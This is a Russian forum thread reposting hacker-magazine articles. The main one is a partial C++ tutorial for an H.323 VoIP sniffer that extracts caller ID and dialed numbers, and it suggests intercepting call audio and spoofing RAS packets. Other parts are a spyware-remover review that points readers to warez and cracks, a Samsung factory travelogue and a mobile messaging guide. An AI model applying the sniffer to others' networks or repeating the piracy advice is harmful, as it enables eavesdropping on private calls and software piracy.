Основными классами, которые используются для погружения в иерархические вложенности данных в пакете, будут PASNSequence и PASNChoice, а точнее, классы, от них унаследованные (ну и, конечно, базовые типы данных, описывающие строки, цифры и т.д.). Sequence, подобно структуре, имеет члены-данные других типов. Проверка на наличие, добавление и исключение этих членов производится с помощью методов HasOptionalFiled(), IncludeOptionalFiled() и RemoveOptionalField() класса PASNSequence. Choice, подобно объединению, может превращаться в различные типы данных, но единовременно - лишь в один. Превращение происходит с помощью явного преобразования типа, а выяснить/установить тип, в который нужно произвести преобразование, можно с помощью установки choice-тегов посредством методов GetTag()/SetTag() класса PASNChoice. Наборы тегов и опциональных полей, соответствующих тому или иному классу, унаследованному от PASNSequence или PASNChoice, можно посмотреть в заголовочных файлах проекта OpenH323, либо в документации на их сайте. Таким образом, сделаем из этого вступления правильные выводы и побежим на сайт OpenH323, чтобы скорее слить и поставить pwlib и openh323lib.

Приступим к действию

Получив в руки библиотеку OpenH323, люди обычно сразу бросаются писать приложения, которые делают из их компа VoIP H.323-телефон. Мы этим заниматься не будем по нескольким причинам: во-первых, это несложно, и, разобрав пример simph323, который поставляется вместе с библиотекой, можно быстро понять, как бросать высокоуровневые вызовы типа "создать на моем интерфейсе 10.0.0.2 H.323-телефон" и "заставить его позвонить на IP 10.0.0.3". Во-вторых, данная работа не дает ни малейшего понятия о непосредственной работе с протоколом. Мы напишем снифер (взяв за основу библиотеку libpcap), попробовав двумя путями отслеживать информацию типа "АОН такой-то пытается позвонить туда-то". Первый метод будет заключаться в том, чтобы обрабатывать непосредственно отснифенную сигнализацию между двумя H.323-устройствами, а второй - в перехвате и декодировании сообщений формата H.225RAS, которыми обмениваются H.323-устройство и гейткипер. Естественно, мы создадим этот снифер для того, чтобы, к примеру, вести статистику разговоров в собственной VoIP-сети, а не для перехвата конфиденциальной информации, потому что, как я думаю, УК ты уважаешь.

LibPcap - ядро снифера

Особо терпеливые могут попробовать писать с помощью raw-сокетов, но я предлагаю использовать универсальную библиотеку libpcap, что помимо облегчения в области программирования даст нам еще и возможность использовать правила фильтрации, наподобие тех, что пользуют в tcpdump'е. Структура приложения вырисовывается приблизительно следующая: блок инициализации, настраивающий и запускающий основной цикл libpcap'а, пакетный диспетчер (функция, которая будет вызываться на каждый отловленный пакет, такова архитектура libpcap), и непосредственно функции декодировки H.323, через которые мы будем отлавливать необходимую инфу. Произведя все необходимые настройки библиотеки, запустим основной цикл pcap-ного снифера, указав ему в качестве диспетчера функцию void dispatcher_handler (u_char *,const struct pcap_pkthdr *, const u_char *):

pcap_loop(fp, 0, dispatcher_handler, (unsigned char *)NULL);

Это ядро нашего снифера, которое будет отдавать каждый пойманный и прошедший фильтрацию пакет в функцию dispatcher_handler. Задача диспетчера - разобрать, стоит ли обрабатывать данный пакет, освободить его от мусора и отдать декодеру:

Основной цикл

void dispatcher_handler(u_char *dumpfile, const struct pcap_pkthdr *header, const u_char *pkt_data)

{

...

Произведем отсечение не ethernet-пакетов, не IP-пакетов, и, наконец, доберемся до UDP и TCP

...

if (ip->ip_p == 0x06) /* Это TCP */

{

tcp = (struct tcphdr *) (pkt_data + ETH_H + IP_H);

int datalen = ntohs(ip->ip_len)-TCP_H-IP_H;

data = (char *) (pkt_data + ETH_H + IP_H + TCP_H);

if (datalen>4 && data[0]==0x03 && data[1]==0x00 ) /* TCP-пакеты, не являющиеся TPKT3, нам не нужны */

{

Если TCP-пакет имеет TPKT3-заголовок, разумно предположить, что это H.225-пакет, и попытаться его раскодировать:

tcpdecodeh323(data, datalen);

}

}

if (ip->ip_p == 0x11) /*Это UDP*/

{

udp = (struct udphdr *) (pkt_data + ETH_H + IP_H);

int datalen = ntohs(ip->ip_len)-UDP_H-IP_H;

data = (char *) (pkt_data + ETH_H + IP_H + UDP_H);

if (datalen>0 ) /* В UDP-пакетах нет TPKT3, но нулевые пакеты нам не нужны */

{

RAS-пакеты не имеют контрольных заголовков, поэтому придется пробовать "на авось" каждый пакет:

udpdecodeh323(data, datalen);

}

}

}

Ради чего все замышлялось

Теперь, когда мы контролируем пакеты в сети и разложили их по кучкам, нам надо создать собственно сами функции декодирования. Функция tcpdecodeh323(char * data, int datalen) будет пытаться раскодировать TCP-пакет, исходя из предположения, что это TCP-TPKT3-Q.931-H.323-H.225-SETUP. А функция udpdecodeh323(char * data, int datalen) - исходя из предположения, что это UDP-H.323-H.225RAS-ADMISSIONREQUEST. Для этого мы как раз и задействуем библиотеку OpenH323:




Автор: Metallica Dec 8 2006, 21:17

TCP-декодер

void tcpdecodeh323(char * data, int datalen)

{

H323SignalPDU H323pdu; /* Основной класс для всей сигнализации H.323, все подклассы наследуются от него */

PBYTEArray rawdata; /* Библиотека PwLib использует свои типы данных для работы с байтовыми массивами */

memcpy(rawdata.GetPointer(len-4),data+4,datalen-4); /* Сбросим уже ненужный 4-байтовый заголовок TPKT3 */

Q931 & q931pdu = H323pdu.GetQ931(); /* Захватим все, что относится к Q.931 */

if (!q931pdu.Decode(rawdata)) /* Попытаемся раскодировать */

{

cerr << "DecodeH323::Parse error of Q931 PDU" << endl; /* Однако, облом */

return;

}

/* Раскодировалось! Можно взять данные из Q.931 */

if (q931pdu.GetMessageType() == Q931::SetupMsg) /* Если это SETUP, то в нем есть номер вызываемого абонента и АОН */

{

......

Помимо других данных, тут есть и то, что интересует нас в первую очередь - АОН и номер вызываемого абонента:

Pstring telnum;

q931pdu.GetCallingPartyNumber(telnum);

cout << "\tAON = " << telnum << endl;

q931pdu.GetCalledPartyNumber(telnum);

cout << "\tAbonent Number = " << telnum << endl;

/*

Поковырявшись в файле q931.h, ты сможешь самостоятельно добыть все остальные данные из этого пакета.

*/

}

if (!q931pdu.HasIE(Q931::UserUserIE))

{

...

Если пакет Q.931 не содержит информационного элемента User-User, значит, это голый ISDN-пакет, без H.323-нагрузки.

...

}

else /* Попытаемся вытащить данные H.323 из IE:USER-USER */

{

PPER_Stream strm = q931pdu.GetIE(Q931::UserUserIE);

if (!H323pdu.Decode(strm))

{

...

Декодирования не получилось. Значит, в элементе User-User содержится не H.323-код, а нечто другое. Ну что ж, случается и такое...

...

}

cout << "H225\tReceived rawdata:\n" << hex << setfill('0') << setprecision(2) << rawdata << dec << setfill(' ') << endl;

cout << "H225\tReceived PDU:\n " << setprecision(2) << H323pdu << endl;

/* Здесь мы просто выводим содержимое пакета на экран, дабы не перегружать и без того уже объемный код, но пытливому читателю не составит труда самостоятельно выдрать нужные поля и использовать их в своих благородных целях */

}

}

UDP вариант я не привожу, т.к. он занимает много места. Если интересно, загляни на наш компакт-диск или скачай полные сорсы с www.xakep.ru. Там все очень подробно откомментировано.

И в заключение

Таким образом, мы создали снифер, который анализирует информацию H.323-VoIP-сессий, не прибегая ни к какому экзотическому железу, кроме нашей сетевой карточки. Безусловно, приведенный здесь пример, как и положено примеру, представляет собой обширное поле для доработки. Но основную свою миссию - разъяснить C++ программисту основы работы с данными протокола H.323, он выполнил. Неплохо бы приделать к нему буфер для фрагментированных TCP-пакетов, сделать несколько потоков для параллельного отслеживания нескольких сессий по их уникальным идентификаторам. Можно пойти и дальше, проанализировать сессию H.225, получив оттуда параметры для перехвата H.245, а оттуда уже получить IP-адреса и UDP-порты по которым идут непосредственно голосовые RTP-пакеты, отснифить их, произвести декодирование соответствующим кодеком и прослушать сам разговор. Можно устроить UDP-спуфинг заранее сформированными пакетами H225RAS (ведь с помощью рассмотренной библиотеки можно не только декодировать пакеты, но и формировать свои) и многое-многое другое. Но все это я оставляю для твоей творческой самореализации.Ссылки по теме

http://www.itu.int - организация ITU, занимающаяся разработками рекомендаций связи, в том числе и протокола H.323.

http://www.openh323.org - команда OpenH323, занимающаяся разработкой библиотек с открытыми исходными кодами, облегчающих жизнь программеру в области того же H.323.




Автор: aler Dec 8 2006, 21:31

Цитата(Frut @ Dec 7 2006, 15:05) *

Metallica, эти километры статей ты сам врят ли прочитал. Маловероятно, что они кому-нибудь нужны.

Цитата(Metallica @ Dec 7 2006, 15:10) *

Нескажу шо прямо все читал но про всякие интересные штуки почитываю!!

Действительно часть статей очень даже нужна.
Хотя не все конечно

Цитата(Metallica @ Dec 7 2006, 12:50) *


[один минус] этой системы, заметный не всем, — то, что при клике на ссылку появляется стандартное окно закачки и внутри него в поле «Источник» будет вписан истинный адрес сервера, откуда пользователь качает файл. Однако если используется утилита типа Flash Get, то ты ничего не увидишь больше, кроме имени закачиваемого файла.


несложно переделать чтобы никому было незаметно

Автор: Metallica Dec 8 2006, 22:47

КАК УЙТИ ОТ СЛЕЖКИ - Средства борьбы со spyware и adware


Ты наверняка ставил на своего железного друга шароварные или фриварные программки. А читал хоть раз, что производитель пишет в лицензионном соглашении, или при установке просто выбирал "Да, на все согласен, только ставь эту фигню быстрее", не вникая в подробности? Напрасно. Некоторые производители честно тебя предупреждают, что в нагрузку с программой на твой винт будет установлен дополнительный так называемый adware или spyware-модуль. Мало того, что эти модули будут воровать конфиденциальную информацию о тебе, так они еще будут нещадно отжирать часть ресурсов тачки и тормозить инет. А вероятность того, что на твоем компе СЕЙЧАС стоит как минимум один шпионский модуль, держись за стул, равняется примерно 99,99%. Не дело, хватайся за вилы, идем спасать родину! В смысле, твою тачку.

<ADWARE и SPYWARE>

По сути adware или spyware - это самостоятельный либо встроенный в программу модуль (spyware отличается от adware тем, что ставится без твоего ведома, под шумок). Функциональное назначение - показ баннеров (к примеру, в Opera или ICQ), надругательство над браузером (загружают подставные адреса в принудительном порядке), отслеживание активности на просторах всемирной паутины (куда ходишь, что качаешь) или сбор любой другой доступной статистики. Пока ты читаешь похождения Алисы в Стране Чудес на сайте какой-нибудь онлайновой библиотеки, шпионские модули сосут из тебя интересующую их информацию.

Простой пример: скачал ты себе бесплатный и симпатичный медиа-проигрыватель, запустил и наслаждаешься под пиво, а он, зараза, украдкой (при наличии соединения с инетом) отсылает некому дяде информацию о том, что ты слушаешь или смотришь в данный момент. С таким же успехом шпионские модули определят, какой софт стоит на твоем компе. Прямо раздолье для защитников лицензионного ПО.

<МЕТОДЫ БОРЬБЫ>

Не хочешь вредоносной нагрузки, ставь себе платные версии программ, практически со стопроцентной гарантией избавишься от вышеописанных проблем. Жалко денег? Тогда ставь себе фаервол и закрывай порты, через которые модули стучатся на родину. Многие, кстати, так и делают, расплачиваясь за это ресурсами своей тачки. Но наиболее эффективный выход - поставить программу для отлова и истребления шпионских модулей. Представляю на твой суд три лучших проги данного вида: Ad-aware Plus, Spybot - Search & Destroy и BPS Spyware/Adware Remover.

<УСТАНОВКА>

Установка всех трех программ проходит без особых хлопот. Единственное - учти, что Ad-aware Plus и Ad-aware Standart Edition отличаются, последняя - урезанная версия (без монитора Ad-Watch). Кроме того, с сайта производителя прямых ссылок на Ad-aware Plus нет, ищи через поисковики и на варезниках. BPS Spyware/Adware Remover - условно-бесплатная, но это не проблема, в инете валяются кряки.

<ИНТЕРФЕЙС>

Приятной оказалась расцветка Ad-aware Plus - расслабляющие оттенки светло-синего с голубым, остальные проги в стандартном сером исполнении. Правда, для Spybot - Search & Destroy нарисовано около 20 дополнительных скинов, выкачивай с http://spybot.eon.net.au. Качеством интерфейса порадовали все три программы: удобно, доступно, интуитивно понятно, помощь практически не нужна. А если вдруг приспичит, прилагается исчерпывающая справка (к сожалению, на английском
BPS Spyware/Adware Remover, увы, не поддерживает русского языка, Spybot - Search & Destroy поддерживает, но переводчик явно схалтурил (перевод сделан частично), а для Ad-aware Plus необходимо дополнительно скачать Languagepack (www.lsfileserv.de/res/aaw-lang-pack.exe, весит 342 Кб), только тогда все менюшки и комментарии будут русифицированными.

<БАЗОВЫЕ ВОЗМОЖНОСТИ>

Принцип действия этих борцов за наши гражданские свободы наводит на мысль об антивирусных средствах: при сканировании винта программа просматривает данные на предмет соответствия информации, которая имеется в ее базе. В конце сканирования формируется сводный отчет, в котором указаны найденные шпионы-вредители (к некоторым дается подробное описание). Остается выбрать неугодных «засланцев», нажать "Удалить" и начать радоваться жизни.

Хотя не все так гладко. Некоторые программы категорически отказываются работать, если удалить встроенный adware или spyware-модуль. Иногда спасает установка более старой или более новой версии отказавшей программы. Не помогает? В таком случае не удаляй шпионский модуль, а просто перекрой ему доступ в инет фаерволом – чтоб эта зараза не могла ни данные отослать, ни баннеров на твою машину залить.

Для того чтобы при необходимости восстановить измененные или удаленные данные, используй возможность отката (backup). Не совсем удачно реализована эта функция в Ad-aware Plus: сделанные изменения и удаления хранятся в виде архива, который восстанавливается целиком. В Spybot - Search & Destroy и BPS Spyware/Adware Remover такой проблемы нет, изменения и удаления хранятся в виде списка. Восстанавливать отдельные шпионские модули можно выборочно, не трогая остальные записи. Чтобы в дальнейшем при сканировании не цепляться за модули, которым ты оставил право на жизнь, в Spybot - Search & Destroy их стоит занести в исключения, а в BPS Spyware/Adware Remover - в игнор-лист, что по сути одно и то же. В Ad-aware Plus подобной возможности нет.

<ОБНОВЛЕНИЯ>

Враги не дремлют и постоянно штампуют все новых и новых шпионов. Поэтому одним из основных критериев отбора подобных программ является периодичность обновления базы и ее полнота. Качество данных в базах оценим в разделе "В ДЕЙСТВИИ", а пока остановимся непосредственно на обновлении.

Все три программы имеют в арсенале встроенный модуль автоматического поиска и выкачивания обновлений из инета. И вот какие обновления были доступны на момент написания статьи:

- для Ad-aware Plus: обновление от 12.06.2003 (OR147), весит 394 Кб, с ним всего в базе 7817 записей;

- для Spybot - Search & Destroy: обновление от 26.05.2003, весит 404 Кб, с ним всего в базе 7489 записей;

- для BPS Spyware/Adware Remover: обновление от 01.06.2003 (апгрейдит прогу до v7.2.0), весит 2,4 Мб, про количество записей информации нет.


Сразу видно, что фаворитом по обновлениям (периодичность до нескольких раз в неделю) и количеству известных шпионов является Ad-aware Plus. У BPS Spyware/Adware Remover обновления почему-то в 7 раз тяжелее, чем у двух других прог, возможно база замещается полностью.

<МОНИТОРИНГ>

Процесс поиска и истребления уже внедрившихся в систему вражеских модулей, конечно, увлекателен, однако, оказывается, эту заразу можно «сбивать» еще на подлете (когда она пытается проникнуть на твою машину вместе с какой-нибудь дельной прогой или хочет протиснуться через «дырку» в браузере во время посещения тобой «зараженного» веб-сайта). Для этих целей и существует так называемый монитор, который отслеживает все процессы на компьютере в реальном времени. Наличием такого монитора могут похвастаться две программы: Ad-aware Plus и BPS Spyware/Adware Remover. В обеих он работает абсолютно одинаково: висит в трее, сообщает обо всех подозрительных изменениях в системе, предлагая вмешаться и навести порядок. Если обнаруженный вредитель есть в базе, пользователю предлагается ознакомиться с его досье. Кроме этого монитор отслеживает запуск подозрительных процессов, защищает от автоматического запуска исполняемых файлов (любимое занятие рассыльщиков вирусов по почте) и защищает от самовольной перезаписи реестра и Startup’а. Единственная проблема - монитор тоже питается ресурсами тачки, поэтому на слабой машине лучше обойтись без него.

<В ДЕЙСТВИИ>

В качестве полигона был выбран диск E, на нем у меня стоит много сомнительных прог, в том числе и браузер. Сразу оговорюсь, что я довольно привередливо отбираю программы для установки, а все временные программы (например, для статей) долго на моем винте не задерживаются. Найденные шпионы не удалялись, чтобы все три программы проверить в равных условиях. Время сканирования засекал по секундомеру wink.gif. Все критерии поиска выставлялись на максимум: проверка архивов, всех видов файлов (не только exe!), файлов большого размера, активных процессов, закладок в браузере (на наличие забаненых адресов), куков и глубокая проверка реестра. Запускал три проги в следующем порядке: сначала Ad-aware Plus, потом Spybot - Search & Destroy и, наконец, BPS Spyware/Adware Remover.

Через 12:50 Ad-ware выдал отчет, оформленный в виде удобочитаемой статистики с указанием количества найденных модулей, помеченных по категориям (процессы, в реестре или же файлы). Найдено было 144 объекта: 3 в реестре и 141 в файлах (140 отслеживающих куков и 1 редиректор браузера - Browser Hijack).

Spybot - Search & Destroy оказался самым резвым и затратил на сканирование 07:03 (время сканирования засекает сам). Отчет не совсем удачно структурирован (сплошной список), а количество найденных багов пришлось считать вручную. Зато описание найденных шпионов развернутое и со ссылками, где можно почитать подробнее. Всего нашлось 97 объектов: 3 в реестре и 94 в файлах (93 отслеживающие куки и 1 эксплоит браузера). Кроме того, были найдены файлы от BPS Spyware/Adware Remover, а в описании утверждалось, что они сперли и используют базу от ранней версии Spybot - Search & Destroy, поэтому следует удалить грабителей (но можно этого и не делать smile.gif).



Автор: Metallica Dec 9 2006, 11:58

Корейские киборгиЖурналисты - народ, как известно, любопытный. А если речь идет о чем-то, что в обычной ситуации скрыто от посторонних глаз, журналистское любопытство становится паталогическим. Поэтому когда к нам в редакцию пришло приглашение от компании Samsung съездить в Корею и посмотреть на их закрытое производство разной комплектухи и периферии, мы сразу согласились. В качестве засланца был выбран hi-tech маньяк, бритоголовый японист из дружественного журнала Мобильные Компьютеры Тимур Деветьяров. Вот что он увидел в стране побежденной атипички.

ИТАК, КОРЕЯ

Как и ожидалось, компания Samsung – это самое крупное предприятие в Корее, производит не только компьютеры, периферию, телефоны и прочие электротовары, но и автомобили. К тому же строит дома – это было сюрпризом. Проехав мимо нескольких домов со знакомым логотипом, мы ненадолго заехали в гостиницу (принадлежит Samsung) и были отвезены в центральный офис компании.

Весь первый этаж занят под выставку достижений: телефоны, 3G аппаратура, ноутбуки и все такое. Фотографировать в зале нельзя, но мы все-таки умудрились сделать несколько снимков.

На этой же выставке можно использовать свежевыпущенные на рынок ноутбуки и ЖК-мониторы для работы, игр и выхода в интернет.

HDD

Первым, что мы услышали, попав на завод, производящий жесткие диски, было требование оставить фото и видеоаппаратуру в салоне автобуса. Это требование повторялось не раз, поэтому придется довольствоваться устными рассказами. Потом нам сообщили, что пройдет совсем немного времени и компания Samsung займет первое место по производству качественных жестких дисков.

У входа в конвейерный цех все снимают обувь и надевают антистатические тапки. Линия по производству HDD – предмет гордости компании, из нее каждые 18 секунд выскакивает новый хард. Люди в процессе создания участвуют, но выполняют вспомогательные функции – подать, принести заготовки и так далее. Вмешиваться в священнодействие нельзя – об этом сообщают многочисленные таблички с надписью на корейском – черным по белому: «Руки не совать».

Наш экскурсовод в пылу объяснения принципов сборки пересек рукой воздушное пространство станка, тот сразу же недовольно гукнул и остановился. Подумав немножко, работу он продолжил, но гида мы больше к станку не подпускали.

Следующий этап – тестирование дисков в специальной лаборатории. Сразу оговоримся, что там проверяются далеко не все диски, предпочтение отдано выборочному тестированию, что вполне логично – слишком велико количество продукции. К сожалению, нашим гидом был работник лаборатории, и английский язык в его институте не был профилирующим предметом. Насколько удалось понять, жесткие диски проходят несколько этапов проверки, в целом это занимает 7 дней. Судите сами, сначала диск омывают так называемой деионизированной водой для дополнительной очистки поверхности прибора. Первый анализ, которому подвергается HDD, это газовый анализ: для этого делается забор газов, выделяемых разогретым металлом.

После этого следует другой анализ – микроскопический и ультразвуковой – осматривается каждый нанометр.

Святая святых завода – вовсе не лаборатория, а секретная Линия, на которую не то что не ступала нога журналиста, а даже и объектив камеры не поворачивался. Видимо, с этим на заводе строго – стоило мне вынуть из кармана авторучку, поднести к глазу и нажать два раза на кнопку, как тут же три пары узких глаз обратились в мою сторону. Раздался строгий окрик:

- Ебае (что это)?

- Манъенпхъиль (ручка).

- Джузэо (дайте посмотреть)!

Пришлось показать и чуть ли не разобрать ручку – нет у меня объектива, нет. Но пошутить люблю. А фотографировать на Линии и вовсе нечего – ходят люди без лиц и половых различий, укутанные в белые или голубые комбинезоны фигуры. Была даже выдвинута теория, что это и не люди совсем, а киборги: от правого запястья в глубину станка у всех шли синие проводки. Подтвердить или опровергнуть теорию никто не мог.

В следующем зале желающие посмотреть на тотальную проверку продукции в обстановке, приближенной к боевой, были вынуждены провериться на наличие статического электричества. Проверились, но смотреть было не на что – обычные платы, обычные тестировочные камеры – шкафы с температурой до +50 С. В шкафах платы пекутся около 40 часов. За готовностью следят девушки-«киборги» с синими проводами. Кроме надзора «киборгов», контроль происходит на диспетчерском пункте, сплошь уставленном мониторами. По желанию можно получить профайл каждой детали – кто был ответственным за изготовление, какие процедуры деталь уже прошла – очень удобно.

Расстояние между считывающей головкой жесткого диска и поверхностью самого диска составляет 0,013 микрон. Размер частички сигаретного пепла – 1 микрон.

Monitors

На заводе мониторов ручного труда оказалось намного больше, наверное, процесс не требует такого же строгого соблюдения технологий, как в производстве HDD. Сборка происходит в довольно большом цехе с высоким потолком. Дабы не тратить понапрасну пространства цехов, прямо над головами сборщиков организована тестировочная линия: телевизоры и мониторы крутятся на карусели и переживают самые тяжелые моменты своей жизни. Неэкранированные приборы подвергаются таким нагрузкам, какие вряд ли им придется испытать в дальнейшей эксплуатации, по крайней мере, они запрещены в инструкции по использованию. После тестов и мониторы, и телевизоры упаковываются в коробки.

Printers

Самый веселый цех – это цех, где собирают принтеры. Во-первых, он светлый, во-вторых, этот цех неоднократный победитель капиталистического соревнования. Это подтверждается вымпелами в красном углу. Но самое главное – в этом цехе работают девушки – очень много. Немного смущают синие проводки, которыми девушки прикреплены к станкам, но мы уже не обращаем на это внимания. Главное, что дамочки делают руками – все принтеры, и даже многие копировальные аппараты и факсы производятся здесь. Такими хрупкими руками собираются не только принтеры Samsung, но и Xerox и даже Hewlett Packard. С недавних пор наши корейские собратья освоили выпуск цветных лазерных принтеров.

Как оказалось, кибердевушки тоже не могут работать без отдыха, в их цехе, как, впрочем, и в других, есть комната отдыха с аквариумом и большим телевизором Samsung (кто бы сомневался). Правда, отдыхают они своеобразно – в тот день, когда мы наблюдали их в естественной среде обитания, девушки клеили какие-то ярлыки на маленькие коробочки. Мы не стали им мешать и ушли на сборку ноутбуков.

Сначала мы прослушали традиционную лекцию на тему того, как стремительно развивается корпорация и насколько быстро она сможет стать основной электронной компанией в мире вообще и в России в частности.

Notebooks

Первое, что поразило – обилие ручного труда. Конвейеры переполнены девушками, причем настоящими девушками – без дурацких проводов на ногах, но их натуральность не вредит производительности: все операции проделываются быстро и четко. На линии сборки фотографировать вновь не разрешили, хотя она производит впечатление обычного конвейера – и не подумаешь, что собирают ноутбуки. Работа, на самом деле, монотонная и отупляющая. При этом все конвейеры оборудованы табличками «Fool Proof» (Защита от дурака). Работницы конвейера приходят сюда после школы, проходят двухмесячные курсы и поступают на работу. Каждый год, а иногда и полгода, проводятся курсы повышения квалификации. И так пять лет, за пять лет состав работающих обновляется. Как желчно заметил начальник цеха по сборке, дольше всех работают некрасивые работницы – остальные выходят замуж раньше.

На прощание мы получили очередную дозу планов по завоеванию мира. Кстати говоря, работа по подготовке персонала к сотрудничеству с международными компаниями уже ведется – даже в туалете висят таблички с английскими фразами, и люди, занимающие ключевые посты в компании, обязаны иметь визитки со своими англизированными именами.

Шокирующее зрелище ожидало нас на Родине. Вся Москва была переполнена молодыми людьми и девушками, в руках у которых были шарики с уже набившим оскомину овальным логотипом – в нашей столице проходил фестиваль бега под патронажем компании Samsung.

P.S. А проводки на ногах работниц заводов оказались вовсе даже и не питанием от сети, а просто заземлением, снимающим статическое напряжение.




Автор: Metallica Dec 9 2006, 12:58

Навечно on-line


ICQ, E-mail и IRC на твоем мобильнике!

Чтобы ничего не упустить, не проворонить и не проморгать, надо постоянно быть на связи! Да и вообще, интернет-зависимость - это не болезнь, а стиль жизни. Хочешь постоянно сидеть в аське, забирать почту даже в метро и чатиться в IRC круглосуточно? Нет проблем! Мобильник с поддержкой Java, советы любимого журнала - и твоя Сеть всегда будет с тобой!

<Даю вводную>

Когда-то очень давно, я уже точно не помню когда (но знающие люди подсказывают, что в апрельском номере ][), у нас уже шла речь об аське на мобильнике... Тогда я только вскользь упомянул об этом, в основном для того, чтобы ты почувствовал прелесть технологии Java в телефонах (поэтому я не буду снова рассказывать, что такое "мидлеты" и как ими пользоваться). Теперь же мы посмотрим вблизи на те возможности, которые может предоставить мобила для доступа к различным интернетовским сервисам, тем более что со времени выхода в свет прошлой статьи многое изменилось...

Для начала новость не очень хорошая - особого разнообразия софта ждать не приходится. Почему? Да потому, что поддержка русского языка (а именно это, на мой взгляд, и является важнейшим критерием отбора) есть всего в одном мидлете для аськи, в одном e-mail-почтовике и в одном IRC-клиенте. Впрочем, утешает, что все они неплохо справляются со своими обязанностями, в чем ты скоро убедишься.

Следующая новость тоже не особо приятна (по крайней мере, для владельцев телефонов Nokia, Motorola и так далее) - я опять буду рассказывать обо всем применительно к мобильникам Siemens. Так уж сложилось, что все вышеуказанные мидлеты разрабатывались в первую очередь для них и на других телефонах или не работают вообще, или не работают почти. А рабочих мидлетов с поддержкой русского языка для неSiemens, по-моему, нет вообще. Так что, моя приверженность продукции немцев обусловлена совершенно прагматическими причинами - пусть у них не лучшие трубки, но зато их функции действительно функционируют smile.gif.

А теперь к делу! Начнем, пожалуй, с аськи...

<Красно-зеленые ромашки>

uMessenger 2.0 VIO

Тип: Siemens J2ME

Размер: 50 Кб

Лицензия: Freeware

Лежит на: www.siemens-club.ru

Довольно стандартный мидлет uMessenger, попав в руки наших доблестных программеров и реверсеров, а именно в руки Sendel'а, за что ему большое спасибо, стал реально качественным и полностью русским продуктом. Но для начала немного технических подробностей...

Эта программка работает по протоколу Jabber и общается с соответствующими серверами. Подробная информация доступна на www.jabber.ru. Для нас же важно, что "жаббер" является некоей "базой", на которую можно "повесить" более распространенные и привычные протоколы - да хотя бы ту же аську. Но это все лирика, так что давай все это осуществим на практике.

Копируй мидлет в телефон и запускай. Так как ты наверняка впервые используешь Jabber, то для начала зарегистрируйся в качестве нового пользователя. Вот и выбирай "Опции"-"Новый польз.". В появившемся окне необходимо указать адрес jabber-сервера, который ты будешь использовать. Рекомендую, не мудрствуя лукаво, вводить "jabber.ru" - вполне нормальный сервак. Теперь дави на "Опции"-"Послать" и заполняй появившуюся через некоторое время форму. Там все очевидно, тем более что мидлет говорит по-русски.

Оказавшись снова в первом окне мидлета, ты теперь можешь с чистой совестью нажимать "Войти". Вводи все те же данные о своем логине и пароле (и выбери "Сохранить пароль: да", если не хочешь делать это постоянно), потом "Опции"-"Войти" и все! uMessenger коннектится к серверу и обычно начинает загрузку контакт-листа, но у нас-то его как раз еще нет. Сейчас создадим... Но прежде всего сходи в "Опции"-"Доб.транспорт" и добавь AIM. Почему AIM, а не ICQ? Во-первых, если кто не в курсе - аська уже давно работает по этому протоколу, а во-вторых, он в общем и целом лучше и надежнее. Хотя никто не мешает добавить и ICQ транспорт или какой-нибудь YaHoo... В любом случае для добавляемого протокола требуется ввести имя (то есть, в нашем случае уже существующий UIN - рекомендую, кстати, создать отдельный именно для мобилы) и пароль, после чего появится возможность добавлять в контакт-лист соответствующих юзеров. И еще обрати внимание на пункт главного меню "Опции"-"Установки": в нем находятся кое-какие мелкие настройки, но главное - используемая кодировка русского языка. На сервере jabber.ru это UTF-8, на большинстве иностранных - ISO-8859-1.

Создавая нового юзера в контакт-листе, необходимо выбрать его тип (AIM), а дальше в "Screen" ввести UIN, а в "Nick" - имя юзера для списка. Единственный сложный момент во всем это счастье - не увлекайся количеством. Оперативная память телефона невелика, и длинный контакт-лист он не потянет, так что, если у тебя начали вылезать всякие ошибки (Java.io.Ioexception и типа того), первая рекомендация - попробовать уменьшить контакт-лист. Вторая - сменить jabber-сервер или просто подождать - серваки иногда глючат, и тогда надо дать им время прийти в себя.

Это все, что касается настройки. Сам процесс использования прост, как Ctrl-Alt-Del: при получении входящей мессаги телефон сигнализирует об этом звуком, вибрацией и подсветкой. Прочитать сообщение ты можешь в "Опции"-"Чат" - оно висит там в виде бегущей строки с указанием имени человека, от которого пришло. По команде "Опции"-"Читать" мессага вылезет в отдельном удобном окне. Самому создавать сообщения можно, нажав на правую софт-клавишу на юзере в контакт-листе или на строчке сообщения в чате.

Полезно иногда обновлять список юзеров ("Опции"-"Обновить лист") и следить за тем, кто в онлайне - такие ники помечаются в списке звездочкой. Особо ленивые могут производить всю настройку мидлета на компе с помощью программы Jajc - она лежит на том же www.jabber.ru и работает так же, как ее мобильный собрат. После установки регистрируешься на сервере, а когда подсоединишься к нему (надпись "Online" внизу окна), добавь AIM-транспорт (кнопка с желтой лампочкой, "Register service"-"AIM transport") и пользователей в контакт-лист (та же кнопка, "Add contact"-"AIM transport)". Главное, ставь после их имен тильду "~" - это необходимо, чтобы мидлет потом "увидел" эти имена, а не показывал в списке голые UIN'ы.
<Мыльная опера>

MailMan 1.0.85beta by SVasiliy

Тип: Siemens J2ME

Размер: 48 Кб

Лицензия: Freeware

Сайт: http://svas.pp.ru/java/mailman/mailman.shtml

В апрельском номере я писал, что почту читать на мобиле нечем. Действительно, тогда дела обстояли именно так. Но вскоре все изменилось - есть все-таки программеры в русских селеньях!

И, что характерно - в селеньях Сименсоидных, так как написанный отличным парнем SVasiliy мидлет MailMan идет только на Siemens, а на других - не хочет (вернее, хочет, но только в очень старой версии 1.0.2, которую любители, например, Нокий могут слить по адресам svas.pp.ru/java/mailman/MailMan102.jad и svas.pp.ru/java/mailman/MailMan102.jar). Скачивай саму программу, заливай на телефон и запускай - посмотрим, что в ней интересного.

Пунктов главного меню не меньше чем у TheBat'а, так что есть где разгуляться. Для начала сходи в "Учетные записи" и настрой все свои почтовые ящики. Все просто: прописываешь инфу о себе, адреса серверов входящей (POP3) и исходящей (SMTP) почты и т.п. Отметить стоит лишь несколько деталей: галочка "читать всегда" в диалоге настройки входящего мыла позволяет за один раз забирать почту с нескольких серверов - при ее установке данный адрес опрашивается всегда, когда опрашиваются другие адреса. Аутентификация SMTP настраивается так же, как и в "настольном" мыльном клиенте. "Критерии загрузки" выставляй в зависимости от модели твоего телефона: на S55 и круче можно позволить себе загружать все письма полностью (первая "галочка"), на М50/С55, где оперативки кот наплакал, лучше грузить одни заголовки, а полностью скачивать только небольшие сообщения - максимальный их размер задается в последней строчке этого диалога. Если снять "галку" "Удалять на сервере", то на нем останутся копии загруженных мессаг - в дальнейшем их можно слить с большого компа.

